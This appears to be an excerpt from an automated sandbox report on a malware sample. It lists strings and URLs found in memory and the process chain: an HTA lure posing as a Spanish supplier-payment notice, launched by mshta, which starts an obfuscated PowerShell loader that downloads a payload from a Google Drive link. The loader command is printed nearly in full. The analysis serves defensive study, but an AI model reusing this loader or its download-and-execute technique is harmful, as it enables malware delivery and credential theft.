Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbY source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ws\System.Core.pdb source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2389835741.00000000079F0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2389835741.00000000079F0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbGCTL source: newfile.exe, 0000000A.00000000.2479023272.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe, 0000000C.00000000.2575308880.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe.8.dr |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2396600262.0000000008A3B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdb source: newfile.exe, newfile.exe, 0000000A.00000000.2479023272.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe, 0000000C.00000000.2575308880.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe.8.dr |
Source: svchost.exe, 00000003.00000002.3246360676.0000021BDE200000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/ |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567 |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe |
Source: edb.log.3.dr |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com |
Source: wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com/line/?fields=hosting |
Source: wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://mail.cash4cars.nz |
Source: powershell.exe, 00000001.00000002.2442017954.000000000554A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://r3.i.lencr.org/0R |
Source: wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://r3.o.lencr.org0 |
Source: powershell.exe, 00000001.00000002.2427094918.00000000044E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.2448479212.0000000006EAF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://x1.c.lencr.org/0 |
Source: wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://x1.i.lencr.org/0 |
Source: powershell.exe, 00000001.00000002.2427094918.00000000044E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004E91000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.2427094918.000000000463D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/ |
Source: wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com//ApU3 |
Source: powershell.exe, 00000001.00000002.2427094918.000000000463D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvHXR |
Source: wab.exe, 00000008.00000002.3246491892.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C91000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh |
Source: wab.exe, 00000008.00000002.3245859914.0000000004C91000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAhou |
Source: powershell.exe, 00000001.00000002.2427094918.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381190586.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381233874.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/ |
Source: powershell.exe, 00000001.00000002.2427094918.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvH&export=download |
Source: wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh&export=download |
Source: wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381190586.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381233874.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/y |
Source: edb.log.3.dr |
String found in binary or memory: https://g.live.com/odclientsettings/Prod/C: |
Source: svchost.exe, 00000003.00000003.2021884411.0000021BDE010000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C: |
Source: powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.2427094918.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.2442017954.000000000554A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: qmgr.db.3.dr |
String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C: |
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta" |
|
Source: C:\Windows\SysWOW64\mshta.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph |